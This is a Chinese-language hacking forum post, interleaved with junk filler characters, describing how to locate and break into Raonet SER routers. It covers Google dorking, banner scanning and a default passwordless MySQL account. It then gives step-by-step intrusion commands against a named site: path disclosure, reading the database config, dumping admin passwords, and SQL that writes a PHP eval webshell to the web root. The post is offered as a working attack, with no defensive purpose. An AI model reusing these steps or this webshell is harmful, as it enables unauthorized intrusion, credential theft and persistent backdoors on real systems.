寻找存在漏洞的路由器方法:
9 X7 _0 V& B6 G/ Q$ _# J; C1 i$ M% n8 O+ r3 X
1:google搜索'Raonet Subscriber Ethernet Router'0 p8 Z# R* p: m Z( T
; j; Q3 S0 d; Z* d; R# c2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
- |4 M6 ]/ z% U; o- w% ~5 I" Z( t, F+ b/ l5 J
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
, g- O, w7 A, \ Y% c/ h9 i- s. F3 O! V/ q. M) S/ i
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
2 j6 l, G. r( b5 {: ^7 }+ Y1 Y
1 F7 b! L1 h2 I Z + r+ ]7 ]( e, Y- T4 {9 ~
) l! Q n( k" N入侵步骤:
& V' J! @+ L5 X0 c: ^4 u8 {/ w( v7 h7 N/ f7 B
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
7 _8 }2 j& p3 ]* C: }* H( P' ~0 ?9 N$ i$ _- T2 t0 u/ i% o" l3 ]
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc% p+ K6 n. m# e D" @. p" k
3:得到密码后连接,查看GUI管理密码:+ n! J! N. G" i* m( X
use ser_500* j4 K; Z' O& @- H# g ]
select id,passwd from user;1 r" {! h5 \3 A& e; D O2 |+ P
4:通过数据库写入webshell,执行命令:
5 D4 v% ]* {. x' J. P' cuse mysql;; d* _) {; w/ V# J8 g, q Q
create table ok(cmd TEXT);
& i8 K G, O4 d- @6 {9 P& b9 C! T* V' Ginsert into ok values("<?php @eval($_POST[cmd])?>"); z m4 e! ?5 x+ m" ` Y
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
. z S6 ]8 R# I1 Y V. Ndrop table ok;
/ I) [6 u7 ^4 n$ \( K
: e% Q5 g# ~. y3 B/ O7 V- C2 l5:连接后门shell.php 1 q7 [, g. c3 i, I2 N5 Y0 M
3 `6 q" Y5 H. `' i6. 搞定!
' j6 _: D2 E5 J8 a l: ?. n; x% q0 s6 F- X, X1 ]
|